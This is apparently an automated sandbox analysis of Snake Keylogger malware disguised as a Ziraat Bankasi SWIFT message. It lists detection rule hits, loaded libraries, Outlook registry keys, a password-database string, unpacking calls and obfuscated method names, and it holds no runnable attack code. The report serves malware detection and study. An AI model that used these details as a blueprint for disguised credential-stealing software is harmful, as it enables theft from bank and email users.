                Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3704448.3.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.371c468.0.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, zDkdNac4quC1dMYuE6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, zDkdNac4quC1dMYuE6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, zDkdNac4quC1dMYuE6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, YeYnh7wEhkC3yHHIic.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/4@4/3
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ziraat Bankasi Swift Mesaji.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMutant created: NULL
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Ziraat Bankasi Swift Mesaji.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4530921525.0000000003D2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Ziraat Bankasi Swift Mesaji.exeReversingLabs: Detection: 57%
                Source: unknownProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: Ziraat Bankasi Swift Mesaji.exe, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, YeYnh7wEhkC3yHHIic.cs.Net Code: fdqWCjtBUi System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, YeYnh7wEhkC3yHHIic.cs.Net Code: fdqWCjtBUi System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, YeYnh7wEhkC3yHHIic.cs.Net Code: fdqWCjtBUi System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0694949E push es; iretd 0_2_069494A0
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 5_2_0111F273 push ebp; retf 5_2_0111F281
                Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: section name: .text entropy: 7.5795061926394425
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, MNIK2Vv6XXyABXoe9x.csHigh entropy of concatenated method names: 'jGdrKR2UJM', 'seCr8IRd0C', 'YaArrjJ8pX', 'qcvrPQcQOQ', 'eq8rNS1Ck6', 'XV8rxvL2f8', 'Dispose', 'Ypi3oKWQZj', 'x1O3GiwSwK', 'aXq39ANcT4'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, HQa78ineXBqsgxt74y.csHigh entropy of concatenated method names: 'BEj8L9jtgL', 'UlI8FgsA4K', 'ToString', 'ND48ochQTx', 'RaG8G2DCvC', 'QSF89Wtfad', 'e1I8uRUZ2x', 'wiU8kwixmw', 'Ged8tMK2BY', 'o6J8w6o8go'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, YmLdhITMvcbPgRbWjO.csHigh entropy of concatenated method names: 'YqcrgGTjW6', 'oWarIkLmU5', 'E4jr5c8wDl', 'LpHr1QTXnE', 'gg5rHJvLrn', 'IShr406xb6', 'SC7rargAOX', 'mNcr649Jke', 'iM5re6aa4j', 'V4br0Jh8Y6'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, hBGRCU7eQIJyYfuchM.csHigh entropy of concatenated method names: 'HXVy9sCT2P', 'WZGyu69Mlq', 'j6JykVWgBG', 'P0PytMONW8', 'ESVyrFu6aL', 'JRPywVdVNu', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, VquffsWhmNp9XiftwX.csHigh entropy of concatenated method names: 'kCCDtDkdNa', 'KquDwC1dMY', 'KbYDLalPC1', 'gDcDF7y5bC', 'OvMDKrt8jN', 'pF4DhX9Jxa', 'PFbAfFn2o60h9GWLkg', 'na80CrVfKCqYFYnI84', 'ol0DDbZnOm', 'UEqDp46aBE'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, IcqGiAaLc8ctDUl2qP.csHigh entropy of concatenated method names: 'RqotoLs08v', 'Kpht9ABNme', 'P2ItkD5L3w', 'Fxik7vxcSL', 'gqxkzTM2kd', 'SqFtEHcBwo', 'sAWtDoKhmZ', 'J1etY9B7al', 'L5ktpA7l5a', 'FsPtWjw7ib'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, s5bC9bleaXdtD0vMrt.csHigh entropy of concatenated method names: 'mcwuVu8XPO', 'LRYuQBZvMR', 'p8J9560gm2', 'FcB91ZXtRU', 'M1x9HEbNtd', 'zci94QeKjg', 'p1g9aLoM6r', 'OY196IPjnL', 'e1Q9eTgVCD', 'sOk90dGSAN'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, Bhp9KYDWdpwU9fBLD0e.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wuAXr8Jw3O', 'JWpXy2gGGQ', 'fSSXP2YYRH', 'xRiXXPWiT7', 'akoXNmAZkQ', 'g8WX2qiyQT', 'p7YXxKttEU'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, qjNhF4gX9JxaMbd99Z.csHigh entropy of concatenated method names: 'stKkirWfG1', 'kOwkGsNINL', 'K9NkurhsQe', 'YxiktJkQBo', 'lKJkwgEuMM', 'NpwubpCo4H', 'AXquRyQwRD', 'eyOuv30oJO', 't4wuJgtIXW', 'HLruTHaxlx'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, ueYB17GD7q56AKrf8L.csHigh entropy of concatenated method names: 'Dispose', 'uyADTBXoe9', 'qX0YIvF1fb', 'Y3UswydjVq', 'xAND7vL51S', 'w24DzGGCkg', 'ProcessDialogKey', 'JG7YEmLdhI', 'xvcYDbPgRb', 'djOYY9BGRC'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, p5gR3YeLcoeRkbfqcL.csHigh entropy of concatenated method names: 'hdBtM2jQ31', 'DAPtBTuOG4', 'sHxtCyQiLg', 'cKetsWfDd9', 'pUYtVSSF7t', 'xn5tO5u7xE', 'ECPtQYaHVB', 'qRstcBfivW', 'Y3EtZA07eo', 'hKrtlSmPvo'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, QnOtmkR2qUl6FporFc.csHigh entropy of concatenated method names: 'btX8Jn1OXR', 'Fa687F9nlu', 'mkI3E2iH0y', 'n9C3D1wBry', 'bSh8AVHWBf', 'rsL8je2jFH', 'Gtb8ULQnp0', 'rSE8SlilVw', 'vGn8f0vGxN', 'TSN8m2mHS5'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, AIq35SIhf0tgilOgBS.csHigh entropy of concatenated method names: 'DiP1nicj2NwGZLhpPRG', 'Dql4iIchtCJvsMa066D', 'UVak3doSBY', 'UTYkrQEeLA', 'mOFkyXl1uK', 'r2tsELc7T5CPPx2vt2h', 'q58Bd7c3FZJIdx1YFqE', 'mc3Q6fcP6NU4oRDjf9R'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, TC6OUpYujNeeZfNAX5.csHigh entropy of concatenated method names: 'O1NCZ2bxK', 'D2BsA80hF', 'sxFOZN2yS', 'YQrQnpvIQ', 'oHjZ9KXNi', 's2pldFTHu', 'tjMml0XSXqfiKMwrUU', 'DOGBDBFwmUAEwRv051', 'f763M5SFa', 'slsypLGMA'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, fMlgOmzveg4IUwP5A4.csHigh entropy of concatenated method names: 'RqfyO1wZnu', 'jEQycS0VjZ', 'IIGyZqAvAg', 'vwdygTBbp9', 'W3ZyIfirn9', 'Y9xy1VPuIx', 'vojyHQ8VPW', 'Br5yxcBINI', 'EeOyM6oH1I', 'zPkyB34ZXi'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, GdoDfXUk8Co9lI9UX1.csHigh entropy of concatenated method names: 'hwJqc5IeUf', 'vukqZDRGTL', 'z2fqglcDCV', 'glgqIjI60y', 'bJXq1CAS5q', 'PvFqHgIgwi', 'GBuqaBu9aV', 'NEoq6pKciq', 'W2aq0cdI8U', 'JswqAsSi4v'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, zDkdNac4quC1dMYuE6.csHigh entropy of concatenated method names: 'S1gGSohreR', 'cxiGfXoqJ2', 'XU6GmlfF5F', 'ma1GnQpUQl', 'ic0GbnPu67', 'UbPGRh2cMy', 'fmpGvmgBTo', 'JjoGJQREMi', 'b8cGTDPoW9', 'fkPG743qo9'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, hEY9mpSPhLvFuIksLJ.csHigh entropy of concatenated method names: 'WMGK0H5Weo', 'xTbKjbqN8w', 'lfEKS8sf2c', 'aZQKfdTZmn', 'n3HKIShP1W', 'GoSK5kl6uv', 'ObrK1WDZ6T', 'AkcKHCsUOq', 'wrGK4uyr40', 'oBbKa9MRIp'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, EfoMYs93yOq7Xq1gsC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EWhYTbfMML', 'YR9Y7wsW08', 'HtLYz0tGrq', 'ToQpEQKK5s', 'GltpDLpxgK', 'ubWpYmI7OQ', 'waHppYj9QO', 'rA9xD4wK034Y76tafcJ'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, eeHsS0DEfSHcKjc7qMU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ji0yAqYUW0', 'lleyjuNR2i', 'qipyURkAnU', 'iWXySSNpOa', 'E6Fyf8qKxf', 'MOMymExYwV', 'xPFyn2u7fq'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, YeYnh7wEhkC3yHHIic.csHigh entropy of concatenated method names: 'wgVpiZB8ny', 'v7Zpo3eNeW', 'MIUpGYbfSW', 'Mxip9VfQ0S', 'Eh2pu5WlDk', 'hjSpk4EcXr', 'bi3ptt71UB', 'q5npw57Ry8', 'mRxpdiaZ4C', 'L1epLvPG0T'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, D70GfmDDlKC4aL7Y8iI.csHigh entropy of concatenated method names: 'Vx0y7GqEhn', 'MXkyz4xfX0', 'rG1PEtb9Eu', 'YAUPD3Ktmx', 'wfdPYjioeY', 'VqdPpn4viS', 'n6BPWJJcH1', 'OPnPiuO1Dx', 'LCDPokX6oX', 'I04PGb0gZt'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, mwHhREmZa5jqOUg3WF.csHigh entropy of concatenated method names: 'ToString', 'u1xhAppFEb', 'zy9hIdOsPY', 'iRUh5IxWRk', 'm6fh18XQQw', 'VcShH6oq8n', 'oSTh4oo094', 'ovihatj8BD', 'XFsh688Tdf', 'DuUheIB2Pq'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.9f70000.5.raw.unpack, L79jj4ZbYalPC19Dc7.csHigh entropy of concatenated method names: 'H5e9scqLK3', 'Vit9O9H6hD', 'No19chfumu', 'RMG9ZUuTF6', 'EtF9KJKH2M', 'NXU9h3OsaS', 'dcu98lrUgM', 'Rgn93ve5Zo', 'ism9rPxqku', 'joD9yZXgCL'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, MNIK2Vv6XXyABXoe9x.csHigh entropy of concatenated method names: 'jGdrKR2UJM', 'seCr8IRd0C', 'YaArrjJ8pX', 'qcvrPQcQOQ', 'eq8rNS1Ck6', 'XV8rxvL2f8', 'Dispose', 'Ypi3oKWQZj', 'x1O3GiwSwK', 'aXq39ANcT4'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, HQa78ineXBqsgxt74y.csHigh entropy of concatenated method names: 'BEj8L9jtgL', 'UlI8FgsA4K', 'ToString', 'ND48ochQTx', 'RaG8G2DCvC', 'QSF89Wtfad', 'e1I8uRUZ2x', 'wiU8kwixmw', 'Ged8tMK2BY', 'o6J8w6o8go'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, YmLdhITMvcbPgRbWjO.csHigh entropy of concatenated method names: 'YqcrgGTjW6', 'oWarIkLmU5', 'E4jr5c8wDl', 'LpHr1QTXnE', 'gg5rHJvLrn', 'IShr406xb6', 'SC7rargAOX', 'mNcr649Jke', 'iM5re6aa4j', 'V4br0Jh8Y6'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, hBGRCU7eQIJyYfuchM.csHigh entropy of concatenated method names: 'HXVy9sCT2P', 'WZGyu69Mlq', 'j6JykVWgBG', 'P0PytMONW8', 'ESVyrFu6aL', 'JRPywVdVNu', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, VquffsWhmNp9XiftwX.csHigh entropy of concatenated method names: 'kCCDtDkdNa', 'KquDwC1dMY', 'KbYDLalPC1', 'gDcDF7y5bC', 'OvMDKrt8jN', 'pF4DhX9Jxa', 'PFbAfFn2o60h9GWLkg', 'na80CrVfKCqYFYnI84', 'ol0DDbZnOm', 'UEqDp46aBE'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, IcqGiAaLc8ctDUl2qP.csHigh entropy of concatenated method names: 'RqotoLs08v', 'Kpht9ABNme', 'P2ItkD5L3w', 'Fxik7vxcSL', 'gqxkzTM2kd', 'SqFtEHcBwo', 'sAWtDoKhmZ', 'J1etY9B7al', 'L5ktpA7l5a', 'FsPtWjw7ib'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, s5bC9bleaXdtD0vMrt.csHigh entropy of concatenated method names: 'mcwuVu8XPO', 'LRYuQBZvMR', 'p8J9560gm2', 'FcB91ZXtRU', 'M1x9HEbNtd', 'zci94QeKjg', 'p1g9aLoM6r', 'OY196IPjnL', 'e1Q9eTgVCD', 'sOk90dGSAN'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, Bhp9KYDWdpwU9fBLD0e.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wuAXr8Jw3O', 'JWpXy2gGGQ', 'fSSXP2YYRH', 'xRiXXPWiT7', 'akoXNmAZkQ', 'g8WX2qiyQT', 'p7YXxKttEU'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, qjNhF4gX9JxaMbd99Z.csHigh entropy of concatenated method names: 'stKkirWfG1', 'kOwkGsNINL', 'K9NkurhsQe', 'YxiktJkQBo', 'lKJkwgEuMM', 'NpwubpCo4H', 'AXquRyQwRD', 'eyOuv30oJO', 't4wuJgtIXW', 'HLruTHaxlx'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, ueYB17GD7q56AKrf8L.csHigh entropy of concatenated method names: 'Dispose', 'uyADTBXoe9', 'qX0YIvF1fb', 'Y3UswydjVq', 'xAND7vL51S', 'w24DzGGCkg', 'ProcessDialogKey', 'JG7YEmLdhI', 'xvcYDbPgRb', 'djOYY9BGRC'
